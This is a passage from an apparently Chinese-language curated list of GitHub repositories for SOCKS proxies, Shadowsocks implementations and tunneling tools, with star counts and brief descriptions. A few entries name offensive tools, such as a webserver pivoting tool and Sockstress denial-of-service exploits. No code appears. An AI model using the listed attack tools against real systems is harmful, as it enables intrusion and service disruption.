[**52**ๆ˜Ÿ][5y] [Py] [x0day/multiproxies](https://github.com/x0day/multiproxies) penetration testing framework that can use socks4/socks5 proxy. - [**50**ๆ˜Ÿ][5m] [JS] [mattcg/socks5-client](https://github.com/mattcg/socks5-client) SOCKS v5 client socket implementation in JavaScript for Node.JS. - [**49**ๆ˜Ÿ][2y] [Py] [mrschyte/socksmon](https://github.com/mrschyte/socksmon) ไฝฟ็”จ BURP ๆˆ– ZAP ็š„ TCP ๆ‹ฆๆˆชไปฃ็† - [**48**ๆ˜Ÿ][29d] [JS] [znetstar/tor-router](https://github.com/znetstar/tor-router) A SOCKS, HTTP and DNS proxy for distributing traffic across multiple instances of Tor - [**44**ๆ˜Ÿ][4m] [Py] [jaredlgillespie/proxyscrape](https://github.com/jaredlgillespie/proxyscrape) Python library for retrieving free proxies (HTTP, HTTPS, SOCKS4, SOCKS5). - [**44**ๆ˜Ÿ][4m] [C] [wongsyrone/transocks-wong](https://github.com/wongsyrone/transocks-wong) A redsocks-like transparent IPv4/IPv6 TCP-to-SOCKS5 redirector (for Linux only) - [**42**ๆ˜Ÿ][2y] [Rust] [alexcrichton/socks5-rs](https://github.com/alexcrichton/socks5-rs) Implementation of a socks5 proxy server in Rust - [**42**ๆ˜Ÿ][5m] [C++] [lianglixin/sksocks](https://github.com/lianglixin/sksocks) SKSocks, for proxy, firewall penetration, data encryption and speeding up internet accessing. - [**42**ๆ˜Ÿ][27d] [Py] [pagekite/pysocksipychain](https://github.com/pagekite/pysocksipychain) Modified socks.py which supports chained proxies - [**41**ๆ˜Ÿ][2y] [6r6/ssr-ml-docker](https://github.com/6r6/ssr-ml-docker) ShadowsockR-Server docker container. - [**40**ๆ˜Ÿ][9m] [Go] [txthinking/socks5](https://github.com/txthinking/socks5) SOCKS Protocol Version 5 Library in Go - [**40**ๆ˜Ÿ][2y] [Py] [zjx20/socks-cli](https://github.com/zjx20/socks-cli) A solution to make CLI commands use socks5 proxy. - [**39**ๆ˜Ÿ][1y] [Dockerfile] [elejke/docker-socks5](https://github.com/elejke/docker-socks5) Docker ะดะปั ะฟะพะดะฝัั‚ะธั socks5 proxy ัะตั€ะฒะตั€ะฐ - [**39**ๆ˜Ÿ][11m] [Py] [keli/furion](https://github.com/keli/furion) Socks5 + SSL Proxy - [**38**ๆ˜Ÿ][4y] [Py] [nonenotnull/regeorg](https://github.com/nonenotnull/regeorg) The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. - [**38**ๆ˜Ÿ][7y] [Java] [ravn/jsocks](https://github.com/ravn/jsocks) Updates for - [**36**ๆ˜Ÿ][9m] [Py] [cyubuchen/free_proxy_website](https://github.com/cyubuchen/free_proxy_website) ่Žทๅ–ๅ…่ดนsocks/https/httpไปฃ็†็š„็ฝ‘็ซ™้›†ๅˆ - [**34**ๆ˜Ÿ][2m] [Shell] [garywill/linux-router](https://github.com/garywill/linux-router) Set Linux as router in one command. Support Internet sharing, redsocks, Wifi hotspot, IPv6. Can also be used for routing VM/containers - [**33**ๆ˜Ÿ][4y] [Py] [pan0pt1c0n/python-sockstress](https://github.com/pan0pt1c0n/python-sockstress) SockStress DoS (Denial of Service) exploit written in Python | - [**33**ๆ˜Ÿ][1y] [Py] [skelsec/socksohttp](https://github.com/skelsec/socksohttp) Socks5 server over Websockets - [**32**ๆ˜Ÿ][4m] [Shell] [riftbit/docker-3proxy](https://github.com/riftbit/docker-3proxy) Smallest and Fastest Docker container for fast proxy setup based on 3proxy SOCKS5 proxy - [**32**ๆ˜Ÿ][1y] [Rust] [sfackler/rust-socks](https://github.com/sfackler/rust-socks) - [**32**ๆ˜Ÿ][1y] [JS] [blinksocks/blinksocks-gui](https://github.com/blinksocks/blinksocks-gui) A web based GUI wrapper for blinksocks. - [**31**ๆ˜Ÿ][2y] [Go] [brimstone/rsocks](https://github.com/brimstone/rsocks) Tiny little reverse socks5 client & server - [**31**ๆ˜Ÿ][11m] [Shell] [s-o-t/telegram-3proxy-install](https://github.com/s-o-t/telegram-3proxy-install) Bash script to install socks5 proxy (3proxy) configured for telegram. - [**29**ๆ˜Ÿ][4y] [Py] [yinghuocho/ghttproxy](https://github.com/yinghuocho/ghttproxy) a gevent based HTTP/HTTPS proxy with SOCKS5 forwarding. - [**29**ๆ˜Ÿ][1m] [Java] [snail007/goproxy-android](https://github.com/snail007/goproxy-android) snail007/goproxyๅ…จ่ƒฝไปฃ็†ๆœๅŠกๅ™จๅฎ‰ๅ“็‰ˆใ€‚้ซ˜ๆ€ง่ƒฝ็š„httpไปฃ็†ใ€httpsไปฃ็†ใ€socks5ไปฃ็†ใ€ssไปฃ็†ใ€ๅ†…็ฝ‘็ฉฟ้€ใ€ๅ†…็ฝ‘็ฉฟ้€p2pใ€ๅ†…็ฝ‘็ฉฟ้€ไปฃ็†ใ€ๅ†…็ฝ‘็ฉฟ้€ๅๅ‘ไปฃ็†ใ€ๅ†…็ฝ‘็ฉฟ้€ๆœๅŠกๅ™จใ€ๆธธๆˆ็›พใ€ๆธธๆˆ้ซ˜้˜ฒใ€ๆธธๆˆไปฃ็†๏ผŒๆ”ฏๆŒAPIไปฃ็†่ฎค่ฏใ€‚websockeไปฃ็†ใ€tcpไปฃ็†ใ€udpไปฃ็†ใ€socketไปฃ็†ใ€้ซ˜ไปฟๆœๅŠกๅ™จใ€‚ๆ”ฏๆŒๆญฃๅ‘ไปฃ็†ใ€ๅๅ‘ไปฃ็†ใ€้€ๆ˜Žไปฃ็†ใ€TCPๅ†…็ฝ‘็ฉฟ้€ใ€UDPๅ†…็ฝ‘็ฉฟ้€ใ€HTTPๅ†…็ฝ‘็ฉฟ้€ใ€HTTPSๅ†…็ฝ‘็ฉฟ้€ใ€httpsไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€httpไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€socks5ไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€socketไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€ssไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€TCP/UDP็ซฏๅฃๆ˜ ๅฐ„ใ€SSHไธญ่ฝฌใ€TLSๅŠ ๅฏ†ไผ ่พ“ใ€ๅ่ฎฎ่ฝฌๆขใ€้˜ฒๆฑกๆŸ“DNSไปฃ็†๏ผŒ้™้€Ÿ๏ผŒ้™่ฟžๆŽฅๆ•ฐใ€‚ - [**28**ๆ˜Ÿ][1y] [Ruby] [igrigorik/em-socksify](https://github.com/igrigorik/em-socksify) Transparent proxy support for any EventMachine protocol - [**28**ๆ˜Ÿ][20d] [snail007/goproxy-cn](https://github.com/snail007/goproxy-cn) ้ซ˜ๆ€ง่ƒฝ็š„httpไปฃ็†ใ€httpsไปฃ็†ใ€socks5ไปฃ็†ใ€ssไปฃ็†ใ€ๅ†…็ฝ‘็ฉฟ้€ใ€ๅ†…็ฝ‘็ฉฟ้€p2pใ€ๅ†…็ฝ‘็ฉฟ้€ไปฃ็†ใ€ๅ†…็ฝ‘็ฉฟ้€ๅๅ‘ไปฃ็†ใ€ๅ†…็ฝ‘็ฉฟ้€ๆœๅŠกๅ™จใ€ๆธธๆˆ็›พใ€ๆธธๆˆ้ซ˜้˜ฒใ€ๆธธๆˆไปฃ็†๏ผŒๆ”ฏๆŒAPIไปฃ็†่ฎค่ฏใ€‚websockeไปฃ็†ใ€tcpไปฃ็†ใ€udpไปฃ็†ใ€socketไปฃ็†ใ€้ซ˜ไปฟๆœๅŠกๅ™จใ€‚ๆ”ฏๆŒๆญฃๅ‘ไปฃ็†ใ€ๅๅ‘ไปฃ็†ใ€้€ๆ˜Žไปฃ็†ใ€TCPๅ†…็ฝ‘็ฉฟ้€ใ€UDPๅ†…็ฝ‘็ฉฟ้€ใ€HTTPๅ†…็ฝ‘็ฉฟ้€ใ€HTTPSๅ†…็ฝ‘็ฉฟ้€ใ€httpsไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€httpไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€socks5ไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€socketไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€ssไปฃ็†่ดŸ่ฝฝๅ‡่กกใ€TCP/UDP็ซฏๅฃๆ˜ ๅฐ„ใ€SSHไธญ่ฝฌใ€TLSๅŠ ๅฏ†ไผ ่พ“ใ€ๅ่ฎฎ่ฝฌๆขใ€้˜ฒๆฑกๆŸ“DNSไปฃ็†๏ผŒ้™้€Ÿ๏ผŒ้™่ฟžๆŽฅๆ•ฐใ€‚ๅฎ˜ๆ–นQQไบคๆต็พค: 42805407ใ€‚ - [**24**ๆ˜Ÿ][9m] [PHP] [jsondeveloper/dante-gui](https://github.com/jsondeveloper/dante-gui) Dante Server (SOCKS5 Proxy) Web Interface (Telegram ready) - [**24**ๆ˜Ÿ][5y] [C] [z3apa3a/3scan](https://github.com/z3apa3a/3scan) 3Scan is fast detector for open HTTP/CONNECT/SOCKS4/SOCKS5/FTP/TELNET proxy - [**22**ๆ˜Ÿ][10m] [Go] [extremecoders-re/go-dispatch-proxy](https://github.com/extremecoders-re/go-dispatch-proxy) SOCKS5 load balancing proxy developed in Go, combines multiple internet connections - [**22**ๆ˜Ÿ][1y] [Go] [ginuerzh/gosocks5](https://github.com/ginuerzh/gosocks5) golang and SOCKS5 - [**21**ๆ˜Ÿ][2y] [JS] [shangxinbo/cardinal](https://github.com/shangxinbo/cardinal) A socks and http proxy by nodejs for you to over GWF - [**18**ๆ˜Ÿ][6y] [Py] [ln5/twisted-socks](https://github.com/ln5/twisted-socks) Adding client SOCKS support to Twisted. - [**15**ๆ˜Ÿ][2y] [Java] [kecon/jsocksproxy](https://github.com/kecon/jsocksproxy) SOCKS proxy written in Java - [**13**ๆ˜Ÿ][4y] [jgamblin/tor](https://github.com/jgamblin/tor) Simple TOR Socks Proxy Container - [**10**ๆ˜Ÿ][8m] [Go] [hanxi/nps](https://github.com/hanxi/nps) ไธ€ๆฌพ่ฝป้‡็บงใ€ๅŠŸ่ƒฝๅผบๅคง็š„ๅ†…็ฝ‘็ฉฟ้€ไปฃ็†ๆœๅŠกๅ™จใ€‚ๆ”ฏๆŒtcpใ€udpๆต้‡่ฝฌๅ‘๏ผŒๆ”ฏๆŒๅ†…็ฝ‘httpไปฃ็†ใ€ๅ†…็ฝ‘socks5ไปฃ็†๏ผŒๅŒๆ—ถๆ”ฏๆŒsnappyๅŽ‹็ผฉใ€็ซ™็‚นไฟๆŠคใ€ๅŠ ๅฏ†ไผ ่พ“ใ€ๅคš่ทฏๅค็”จใ€headerไฟฎๆ”น็ญ‰ใ€‚ๆ”ฏๆŒwebๅ›พๅฝขๅŒ–็ฎก็†๏ผŒ้›†ๆˆๅคš็”จๆˆทๆจกๅผใ€‚ - [**10**ๆ˜Ÿ][3y] [Go] [marcelki/sockstress](https://github.com/marcelki/sockstress) Sockstress (CVE-2008-4609) DDoS implementation written in Go - [**8**ๆ˜Ÿ][4y] [Py] [jun7th/tsocks](https://github.com/jun7th/tsocks) A reverse socks5 proxy server with ssl(ไธ€ไธชSocks5ไปฃ็†ๆœๅŠกๅ™จ็จ‹ๅบ) - [**7**ๆ˜Ÿ][2y] [C] [qusic/skia](https://github.com/qusic/skia) Transparent SOCKS Redirector for iOS - [**6**ๆ˜Ÿ][1y] [stefanoj3/tordock](https://github.com/stefanoj3/tordock) Dockerized TOR socks5 - [**5**ๆ˜Ÿ][5y] [Py] [rpicard/socksonsocks](https://github.com/rpicard/socksonsocks) A tool to set a socket up for using a SOCKS proxy - [**5**ๆ˜Ÿ][2y] [Shell] [flavioaiello/redsocks](https://github.com/flavioaiello/redsocks) Production ready transparent proxy for docker on corporate networks - [**3**ๆ˜Ÿ][2y] [Py] [pannzh/fsocks](https://github.com/pannzh/fsocks) Yet another socks5 proxy to bypass firewall - [**2**ๆ˜Ÿ][8y] [JS] [markfisher/twitter-rabbit-socks-sample](https://github.com/markfisher/twitter-rabbit-socks-sample) ### <a id="cb16466a31a167bb61f39e2a4a85f449"></a>Shadowsocks #### <a id="60a91763cc1c0e034bee9717b9b87468"></a>ๆœชๅˆ†็ฑป - [**1891**ๆ˜Ÿ][4m] [C] [shadowsocks/simple-obfs](https://github.com/shadowsocks/simple-obfs) A simple obfuscating tool (Deprecated) - [**632**ๆ˜Ÿ][4y] [CoffeeScript] [shadowsocks/shadowsocks-chromeapp](https://github.com/shadowsocks/shadowsocks-chromeapp) Chrome client for shadowsocks - [**574**ๆ˜Ÿ][2y] [JS] [shadowsocks-plus/shadowsocks-plus](https://github.com/shadowsocks-plus/shadowsocks-plus) - [**530**ๆ˜Ÿ][3y] [ObjC] [herzmut/shadowsocks-ios](https://github.com/herzmut/shadowsocks-ios) Fork of shadowsocks/shadowsocks-iOS - [**523**ๆ˜Ÿ][10m] [JS] [mrluanma/shadowsocks-heroku](https://github.com/mrluanma/shadowsocks-heroku) shadowsocks over WebSocket, support Heroku. - [**502**ๆ˜Ÿ][18d] [JS] [shadowsocks/shadowsocks-org](https://github.com/shadowsocks/shadowsocks-org) The official website of Project Shadowsocks. - [**371**ๆ˜Ÿ][2y] [Java] [zc-zh-001/shadowsocks-share](https://github.com/zc-zh-001/shadowsocks-share) ็คบไพ‹็ซ™็‚น - [**311**ๆ˜Ÿ][6y] [Py] [shadowsocks/shadowdns](https://github.com/shadowsocks/shadowdns) A DNS forwarder using Shadowsocks as the server - [**229**ๆ˜Ÿ][2y] [CoffeeScript] [521xueweihan/shadowsocks-heroku](https://github.com/521xueweihan/shadowsocks-heroku) ๆœฌ้กน็›ฎๅทฒๅˆ ้™ค - [**202**ๆ˜Ÿ][2y] [weilaihui/ss-net](https://github.com/weilaihui/ss-net) ๅ…ฑไบซshadowsocksไธปๆœบ - [**192**ๆ˜Ÿ][4m] [Shell] [unbinilium/twist](https://github.com/unbinilium/twist) A light script for you to setup shadowsocks-libev server with high-speed connections and newest powerful features - [**181**ๆ˜Ÿ][8m] [shadowsocks/papers](https://github.com/shadowsocks/papers) List of papers related to shadowsocks - [**174**ๆ˜Ÿ][4y] [Py] [shadowsocks-backup/shadowsocks](https://github.com/shadowsocks-backup/shadowsocks) - [**127**ๆ˜Ÿ][2d] [Py] [v3aqb/fwlite](https://github.com/v3aqb/fwlite) A anti-censorship HTTP proxy with builtin shadowsocks support. - [**118**ๆ˜Ÿ][1y] [JS] [shadowsocks/shadowsocks-hub](https://github.com/shadowsocks/shadowsocks-hub) A web app managing shadowsocks users, servers, nodes, products, accounts, and traffic. Suitable for internal use by companies, organizations, and friends. - [**109**ๆ˜Ÿ][4m] [Shell] [immmx/ubnt-mips-shadowsocks-libev](https://github.com/immmx/ubnt-mips-shadowsocks-libev) Cross complie shadowsocks for UBNT devices based on mipsel or mips64 - [**106**ๆ˜Ÿ][4y] [liuchenx/surgeconfig](https://github.com/liuchenx/surgeconfig) surge app shadowsocks config - [**97**ๆ˜Ÿ][4m] [Py] [guyingbo/shadowproxy](https://github.com/guyingbo/shadowproxy) A proxy server that implements Socks5/Shadowsocks/Redirect/HTTP (tcp) and Shadowsocks/TProxy/Tunnel (udp) protocols. - [**93**ๆ˜Ÿ][2m] [Py] [gxfxyz/unblockchn](https://github.com/gxfxyz/unblockchn) Unblock CHN - Shadowsocks ๅ›žๅ›ฝ่งฃ้”ไปฃ็†ๅˆ†ๆต้…็ฝฎๅทฅๅ…ท (่ทฏ็”ฑๅ™จ & Surge) - Unblock Youku ่ก็”Ÿๅทฅๅ…ท - [**92**ๆ˜Ÿ][2y] [Shell] [henryho2006/rpiproxy](https://github.com/henryho2006/rpiproxy) Make a Raspberry PI as a proxy route, work with shadowsocks server, provide clean dns/proxy service - [**91**ๆ˜Ÿ][5y] [JS] [nihgwu/nevermore](https://github.com/nihgwu/nevermore) a shadowsocks client powered by node-webkit - [**88**ๆ˜Ÿ][3y] [JS] [lovetingyuan/fq](https://github.com/lovetingyuan/fq) fqๅบ”็”จ๏ผŒๅŸบไบŽnodejsๅ’Œshadowsocks - [**80**ๆ˜Ÿ][7m] [PHP] [shadowsocks/shadow-shop](https://github.com/shadowsocks/shadow-shop) Building highly customizable e-commerce websites selling shadowsocks services, using Wordpress and WooCommerce - [**78**ๆ˜Ÿ][9d] [Shell] [acris/shadowsocks-asuswrt-merlin](https://github.com/acris/shadowsocks-asuswrt-merlin) Shadowsock for Asuswrt-Merlin New Gen - [**75**ๆ˜Ÿ][8m] [Py] [huaisha1224/shadowsocks-client](https://github.com/huaisha1224/shadowsocks-client) The ShadowSocks client is a support multiple server port and password - [**72**ๆ˜Ÿ][22d] [Py] [ehco1996/aioshadowsocks](https://github.com/ehco1996/aioshadowsocks) ็”จ asyncio ้‡ๅ†™ shadowsocks ~ - [**69**ๆ˜Ÿ][6m] [JS] [jiang-xuan/deepinss](https://github.com/jiang-xuan/deepinss) Deep in shadowsocks. - [**68**ๆ˜Ÿ][2y] [Go] [ihciah/inner-shadowsocks](https://github.com/ihciah/inner-shadowsocks) Shadowsocks -> socks5 on server. (Created for providing socks5 proxy for Telegram) - [**63**ๆ˜Ÿ][5m] [Go] [yryz/httpproxy](https://github.com/yryz/httpproxy) ไธ€ไธช่ฝป้‡็บงHTTPไปฃ็†๏ผŒๆ”ฏๆŒshadowsocksๆœๅŠก๏ผŒๆ–นไพฟๅ‘ฝไปค่กŒใ€ๅผ€ๅ‘็Žฏๅขƒไฝฟ็”จใ€‚ - [**60**ๆ˜Ÿ][9m] [JS] [shadowsocks/shadowsocks-restful-api](https://github.com/shadowsocks/shadowsocks-restful-api) Secure, reliable, standard restful api for managing shadowsocks-libev - [**59**ๆ˜Ÿ][1y] [Py] [vonsdite/auto_shadowsocks](https://github.com/vonsdite/auto_shadowsocks) Shadowsocks. ็ง‘ๅญฆไธŠ็ฝ‘, ไป…ไพ›ๅญฆไน ใ€‚ๆ˜ฏๅ…่ดน็š„ๆœๅŠกๅ™จ๏ผŒๅฏ่ƒฝๅญ˜ๅœจ็ง‘ๅญฆไธŠ็ฝ‘ไธ็จณๅฎšใ€‚ - [**56**ๆ˜Ÿ][1m] [Swift] [chengluffy/shadowsocksfree](https://github.com/chengluffy/shadowsocksfree) Try Yourself. - [**52**ๆ˜Ÿ][2y] [C] [shadowsocks/libsscrypto](https://github.com/shadowsocks/libsscrypto) Build libsscrypto.dll for shadowsocks-windows. - [**48**ๆ˜Ÿ][17d] [TS] [srar/socks2shadowsocks](https://github.com/srar/socks2shadowsocks) ๅ•Socks5 ่ฝฌๆข ๅคšShadowsocks็ซฏๅฃ ๆต้‡็ปŸ่ฎก ๆŠ“ๅŒ…ๅˆ†ๆž TypeScript - [**44**ๆ˜Ÿ][4m] [HTML] [mrluanma/shadowsocks-websocket-python](https://github.com/mrluanma/shadowsocks-websocket-python) shadowsocks over WebSocket, support Heroku. - [**40**ๆ˜Ÿ][1y] [TS] [icodesign/proxy-uri](https://github.com/icodesign/proxy-uri) Helper to generate/parse Shadowsocks(R)/HTTP(S) URI - [**38**ๆ˜Ÿ][4y] [C] [taichisocks/shadowsocks](https://github.com/taichisocks/shadowsocks) Lightweight shadowsocks client for iOS and Mac OSX base on shadowsocks-libev - [**38**ๆ˜Ÿ][3m] [Py] [kamingchan/shadowsocks-munager](https://github.com/kamingchan/shadowsocks-munager) Middleware of shadowsocks-libev and sspanel - [**36**ๆ˜Ÿ][3y] [Go] [davidqhr/socccks](https://github.com/davidqhr/socccks) Socccks is a shadowsocks like separated socks5 proxy - [**35**ๆ˜Ÿ][5y] [plutochiou/shadowsocks-rss](https://github.com/plutochiou/shadowsocks-rss) shadowsocks update rss - [**32**ๆ˜Ÿ][5y] [Shell] [duoduo369/oh-my-shadowsocks](https://github.com/duoduo369/oh-my-shadowsocks) shadowsocks config on server, supervisor support - [**28**ๆ˜Ÿ][2y] [Swift] [jeanshuang/potatso](https://github.com/jeanshuang/potatso) ้€‚้…Xcode9.3 iOS11.3 Swift3.3็ผ–่ฏ‘้€š่ฟ‡ใ€‚ (unmaintained) Potatso is an iOS client that implements Shadowsocks proxy with the leverage of NetworkExtension framework in iOS 9. - [**23**ๆ˜Ÿ][5d] [Shell] [samuelhbne/vpn-launchpad](https://github.com/samuelhbne/vpn-launchpad) Builds Shadowsocks VPN server on AWS EC2 with QR code support. Works on Ubuntu, OSX and Debian variants including Raspbian. - [**21**ๆ˜Ÿ][1y] [JS] [shadowsocks/shadowsocks-hub-api](https://github.com/shadowsocks/shadowsocks-hub-api) A set of open and standard restful APIs for managing shadowsocks users, servers, nodes, products, accounts, and traffic. - [**21**ๆ˜Ÿ][2y] [Py] [sorz/ssmanager](https://github.com/sorz/ssmanager) A python module managing large amount of running Shadowsocks server instances. - [**20**ๆ˜Ÿ][2y] [JS] [lersh/potatostream](https://github.com/lersh/potatostream) Shadowsocks like Proxy,Written by nodejs - [**19**ๆ˜Ÿ][15d] [windelight/superacl](https://github.com/windelight/superacl) ้€‚็”จไบŽShadowsocksๅ„ๅฎขๆˆท็ซฏ่ฝฏไปถๅ’Œๅ…ถRSS็ญ‰่ก็”Ÿ็‰ˆๆœฌ็š„่ฎฟ้—ฎๆŽงๅˆถ่ง„ๅˆ™ - [**19**ๆ˜Ÿ][2y] [Shell] [cool2645/ssmu_install](https://github.com/cool2645/ssmu_install) Shadowsocks-go manyuser auto installer - [**19**ๆ˜Ÿ][1y] [Shell] [necan/shadowsocks-libev-static-build](https://github.com/necan/shadowsocks-libev-static-build) ้™ๆ€็ผ–่ฏ‘ shadowsocks-libev - [**18**ๆ˜Ÿ][3m] [Py] [elder-wu/ssserverdevicelimit](https://github.com/elder-wu/ssserverdevicelimit) ๅฏไปฅ่ฎฉShadowsocksๆœๅŠกๅ™จ้™ๅˆถๆŸไธช็ซฏๅฃ็š„่ฎพๅค‡่ฟžๆŽฅๆ•ฐ๏ผŒ้˜ฒๆญขๆœ‰ไบบๆถๆ„ๅˆ†ไบซss่ดฆๅท - [**3**ๆ˜Ÿ][2y] [Shell] [altiplanogao/raspbian-ss](https://github.com/altiplanogao/raspbian-ss) Transparent proxy server (use shadowsocks & chinadns) on raspberry pi #### <a id="bdf7adbb1e8c52aa89dc771aa5fedc4b"></a>ๆ”ถ้›† - [**304**ๆ˜Ÿ][2y] [Shell] [sirzdy/shadowsocks](https://github.com/sirzdy/shadowsocks) ไธŽ ShadowSocks ๆœ‰ๅ…ณ็š„ๆ•™็จ‹ใ€ๆ–‡ไปถ็ญ‰ #### <a id="f90ec3d0727d2ee3840df6c9f9557756"></a>Shadowsocks-lib/gui - [**45779**ๆ˜Ÿ][5d] [C#] [shadowsocks/shadowsocks-windows](https://github.com/shadowsocks/shadowsocks-windows) Shadowsocks็š„Windowsๅฎขๆˆท็ซฏ - [**32060**ๆ˜Ÿ][4y] [Py] [shadowsocks/shadowsocks](https://github.com/shadowsocks/shadowsocks) shadowsocksๅŽŸ็‰ˆ - [**12738**ๆ˜Ÿ][19d] [C] [shadowsocks/shadowsocks-libev](https://github.com/shadowsocks/shadowsocks-libev) libev port of shadowsocks - [**7431**ๆ˜Ÿ][2m] [C++] [shadowsocks/shadowsocks-qt5](https://github.com/shadowsocks/shadowsocks-qt5) A cross-platform shadowsocks GUI client - [**6568**ๆ˜Ÿ][6m] [Go] [shadowsocks/shadowsocks-go](https://github.com/shadowsocks/shadowsocks-go) go port of shadowsocks (Deprecated) - [**2793**ๆ˜Ÿ][1m] [Makefile] [shadowsocks/openwrt-shadowsocks](https://github.com/shadowsocks/openwrt-shadowsocks) Shadowsocks-libev for OpenWrt/LEDE - [**2025**ๆ˜Ÿ][5y] [CoffeeScript] [shadowsocks/shadowsocks-gui](https://github.com/shadowsocks/shadowsocks-gui) Shadowsocks GUI client - [**1928**ๆ˜Ÿ][4y] [Py] [ziggear/shadowsocks](https://github.com/ziggear/shadowsocks) backup of https://github.com/shadowsocks/shadowsocks - [**1431**ๆ˜Ÿ][7d] [Rust] [shadowsocks/shadowsocks-rust](https://github.com/shadowsocks/shadowsocks-rust) A Rust port of shadowsocks - [**1334**ๆ˜Ÿ][4y] [mengskysama/shadowsocks](https://github.com/mengskysama/shadowsocks) A fast tunnel proxy that helps you bypass firewalls - [**1324**ๆ˜Ÿ][2m] [C++] [shadowsocks/libqtshadowsocks](https://github.com/shadowsocks/libqtshadowsocks) A lightweight and ultra-fast shadowsocks library written in C++14 with Qt framework - [**1225**ๆ˜Ÿ][3y] [CoffeeScript] [shadowsocks/shadowsocks-nodejs](https://github.com/shadowsocks/shadowsocks-nodejs) a node.js port of shadowsocks. - [**907**ๆ˜Ÿ][1y] [Go] [huacnlee/flora-kit](https://github.com/huacnlee/flora-kit) ๅŸบไบŽ shadowsocks-go ๅš็š„ๅฎŒๅ–„ๅฎž็Žฐ๏ผŒๅฎŒๅ…จๅ…ผๅฎน Surge ็š„้…็ฝฎๆ–‡ไปถ - [**866**ๆ˜Ÿ][10m] [Shell] [shadowsocks/luci-app-shadowsocks](https://github.com/shadowsocks/luci-app-shadowsocks) OpenWrt/LEDE LuCI for Shadowsocks-libev - [**846**ๆ˜Ÿ][12m] [PHP] [walkor/shadowsocks-php](https://github.com/walkor/shadowsocks-php) A php port of shadowsocks based on workerman. A socks5 proxy written in PHP. - [**454**ๆ˜Ÿ][4y] [clowwindy/shadowsocks-libev](https://github.com/clowwindy/shadowsocks-libev) - [**425**ๆ˜Ÿ][4m] [JS] [lolimay/shadowsocks-deepin](https://github.com/lolimay/shadowsocks-deepin) a powerful shadowsocks client for linux deepin. - [**421**ๆ˜Ÿ][3y] [Py] [mengskysama/shadowsocks-rm](https://github.com/mengskysama/shadowsocks-rm) A fast tunnel proxy that helps you bypass firewalls - [**398**ๆ˜Ÿ][1y] [Go] [riobard/go-shadowsocks2](https://github.com/riobard/go-shadowsocks2) Experimental Shadowsocks in Go. Stable fork at - [**249**ๆ˜Ÿ][5m] [Py] [fsgmhoward/shadowsocks-py-mu](https://github.com/fsgmhoward/shadowsocks-py-mu) A fast tunnel proxy server for multiple users - [**243**ๆ˜Ÿ][4y] [Py] [rockerflower/shadowsocks](https://github.com/rockerflower/shadowsocks) - [**210**ๆ˜Ÿ][7y] [haohaolee/shadowsocks-openwrt](https://github.com/haohaolee/shadowsocks-openwrt) A package of shadowsocks for OpenWrt - [**195**ๆ˜Ÿ][3y] [Py] [falseen/shadowsocks-pyqt](https://github.com/falseen/shadowsocks-pyqt) ไธ€ไธช็”จPyQt5ๅฎž็Žฐ็š„shadowsocks ๅฎขๆˆท็ซฏ, ๅฏไปฅๅœจ windowsใ€linuxใ€OSX ็ญ‰ๅนณๅฐไธŠ่ฟ่กŒ - [**192**ๆ˜Ÿ][2m] [Java] [tongxiji/shadowsocks-java](https://github.com/tongxiji/shadowsocks-java) shadowsocks server base on netty4 , tcp & udp full support, - [**185**ๆ˜Ÿ][7y] [CoffeeScript] [shadowsocks/shadowsocks-dotcloud](https://github.com/shadowsocks/shadowsocks-dotcloud) a port of shadowsocks via websockets protocol, able to tunnel through HTTP proxy - [**167**ๆ˜Ÿ][2y] [Rust] [loggerhead/shadowsocks-rust](https://github.com/loggerhead/shadowsocks-rust) Oh my implementation of Shadowsocks in Rust - [**155**ๆ˜Ÿ][2m] [Go] [ihciah/go-shadowsocks-magic](https://github.com/ihciah/go-shadowsocks-magic) A shadowsocks implementation in golang with Multi-connection Acceleration - [**150**ๆ˜Ÿ][1y] [Java] [zhangjiupeng/agentx](https://github.com/zhangjiupeng/agentx) Shadowsocksๅ‡็บง็‰ˆ๏ผŒๆ”ฏๆŒๅ่ฎฎไผช่ฃ…ๅ’Œๆต้‡ๅŽ‹็ผฉ๏ผŒๆ˜“ไบŽๆ‰ฉๅฑ•๏ผŒๅฏ็ปŸ่ฎกๆต้‡ - [**123**ๆ˜Ÿ][3y] [JS] [openmarshall/shortcutss](https://github.com/openmarshall/shortcutss) This is a Mac Shadowsocks client equipped with global shortcuts to switch proxy mode ! - [**88**ๆ˜Ÿ][2y] [Go] [dawei101/tongsheclient.shadowsocks-go-ui](https://github.com/dawei101/tongsheclient.shadowsocks-go-ui) shadowsocks client for all desktop platform(mac osx/windows/linux) with golang - [**71**ๆ˜Ÿ][2y] [HTML] [onplus/shadowsocks-websocket-python](https://github.com/onplus/shadowsocks-websocket-python) shadowsocks over WebSocket, support Heroku. - [**58**ๆ˜Ÿ][6y] [CoffeeScript] [lupino/shadowsocks-gui](https://github.com/lupino/shadowsocks-gui) Shadowsocks GUI client - [**45**ๆ˜Ÿ][1y] [Shell] [qiang-yu/shadowsocksvpn-openwrt](https://github.com/qiang-yu/shadowsocksvpn-openwrt) Shadowsocks-libev-full for OpenWrt - [**44**ๆ˜Ÿ][2y] [C#] [tkyu/shadowsocks-csharp-mod](https://github.com/tkyu/shadowsocks-csharp-mod) Shadowsocks for Windows - [**38**ๆ˜Ÿ][1y] [Elixir] [paulzql/shadowsocks-ex](https://github.com/paulzql/shadowsocks-ex) elixir port of shadowsocks - [**33**ๆ˜Ÿ][2y] [Perl] [zhou0/shadowsocks-perl](https://github.com/zhou0/shadowsocks-perl) An asynchronous, non-blocking shadowsocks client and server written in Perl. - [**31**ๆ˜Ÿ][3y] [Py] [loggerhead/shadowsocks](https://github.com/loggerhead/shadowsocks) - [**31**ๆ˜Ÿ][2y] [Makefile] [xc2/shadowsocks-libev-tomato](https://github.com/xc2/shadowsocks-libev-tomato) Pre-compiled shadowsocks-libev for TomatoUSB, Tomato Shibby, Toastman and Asuswrt Merlin. - [**29**ๆ˜Ÿ][12m] [Java] [bestoa/shadowsocks-vertx](https://github.com/bestoa/shadowsocks-vertx) Java port of shadowsocks with vertx. - [**28**ๆ˜Ÿ][2y] [C] [zhou0/mysocks](https://github.com/zhou0/mysocks) The cross-platform shadowsocks client and server with 